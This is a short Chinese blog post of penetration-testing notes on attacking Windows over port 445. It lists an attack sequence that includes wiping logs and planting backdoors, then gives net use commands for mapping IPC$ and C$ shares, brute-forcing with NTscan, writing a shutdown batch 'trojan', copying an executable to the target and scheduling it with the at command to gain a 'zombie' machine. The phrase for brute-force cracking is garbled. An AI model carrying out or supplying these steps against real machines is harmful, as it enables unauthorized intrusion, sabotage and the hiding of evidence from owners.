渗透测试（445端口）

笔记

由于太困，文章涉及的软件想要私聊（其实网上都有，想找都能找到）
还有有的软件下载谷歌浏览器权限不足（这个问题我也不知道是不是叫这个）
解决：谷歌里面安装迅雷插件，或者换个浏览器下载或者复制下载连接在迅雷里面下载；
太困了，明天再写吧！1!!!

1.授权

2.信息收集（nslookup whois）

3.扫描漏洞

​ namp扫描IP 范围 端口 80 {IIS，apache,什么网站，软件 漏洞}）scanpot软件扫描；

​ 高级扫描：如IIS漏洞 2003-iis6.0 2008iis7.0

​ 扫描网站漏洞（十大网站漏洞 ）

4.漏洞利用

5.提权（shell环境命令控制权，桌面环境，最高权限）

=======删库跑路

6.毁尸灭迹（删除日志）

7.留后门

8.渗透测试报告(漏洞，端口)=》安全加固方案

手工测试端口号开放：

​ telnet IP地址 测试端口

映射共享文件夹，在本地电脑F盘

net use f: \10.1.1.2\share ROOT /user:administrator

net use f: \10.1.1.2\share /del

md 文件夹(创建文件夹)

w漏洞利用之IPC$：

net use f: \10.1.1.2\share 密码 /user:用户名

net use f: /del

net use * /del

net use f: \10.1.1.2\c$ 密码 /user:用户名

net use f: \10.1.1.2\ipc$ 密码 /user:用户名

暴力激活成功教程系统密码之445：

445漏洞利用之一IPC$：

1、scanport 扫描445端口

2、进行暴力激活成功教程：NTscan

net use f: \10.1.1.2\ipc$ 密码 /user:用户名

net use f: \10.1.1.2\share 密码 /user:用户
net use * /del
net use * /del

net use f: \10.1.1.2\c$ 密码 /user:用户名

4、制作木马

copy con haha.bat

shutdown -s -t 100

^z

拷贝在f:盘

copy haha.bat f:

5、植入木马（留后门）

copy d:\heihei.exe \10.1.1.2\c$
6、设计计划任务自动执行木马：

net time \10.1,1.2
at \10.1.1.2 11:11 “c:\heihei.exe”
7、等待肉鸡上线

参考文献：
千锋教育(https://www.bilibili.com/video/BV1i7411G7vm)

今天的文章渗透测试（445端口）分享到此就结束了，感谢您的阅读，如果确实帮到您，您可以动动手指转发给其他人。